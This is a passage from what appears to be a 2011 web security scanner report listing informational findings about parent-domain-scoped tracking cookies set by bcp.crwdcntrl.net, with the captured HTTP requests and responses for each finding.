Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK%2FmRQZ2BQUBJxY8NKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMVEyDFNQOsnU8UokEYTImcgyipBisROA4xxQ1MCT2DODcCwiuG6DsE4ZVAXPYerE9YH0zx%2FoP4wRSi7wDEuf5AHgAyMCmY; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2kh9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydubQNSX22eAFDNQ%2FCcD3y8GHmUBByY0pUBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChdXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCc%2B7Nr; OAID=256d63b06b8b5a8d4fa891a87d791a1a

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:53 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.31. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:28 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.32. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.33. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:57 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC0loGBUd%2FK6dspBnUGBgGlBoYGoHgvmOK5DKZEt4Epwa9gipcZIncTIrcfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg6ipBpMCRyHmOIGpoSeQZwbAeEVQ%2FQdgvBKIC57D9GuD3H8PwhlCtF3AOJcfyAPAOu1Plw%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaO3%2F77GxDAyM%2BlZO306BxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBu6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCYn7d6; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.34. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:16:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAjzsDAqG%2BVvteOQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKPxPTA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgRvz%2F9%2BDPDAyM%2Blbpe%2B1AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvNIOrL7blAipmBQfgnA98vBh5lAQcmoNL%2FF8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1ioHi7EKLRpB7JGRrAqF7gqEJ%2BBS6ZOHb%2BTA3j34VcQuIgZvwKu1kkEFNQ34FfA%2BXg5fgXcCbsIKdiJXwFfxVv8CmTNLuJXAADN7bIU; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.35. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.36. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:40 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.37. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBsz8DAqG%2FlqneZQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKdJPTM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2P7%2F95jTDAyM%2BlauepdBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA%2B9PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQDJArZm

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:29 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
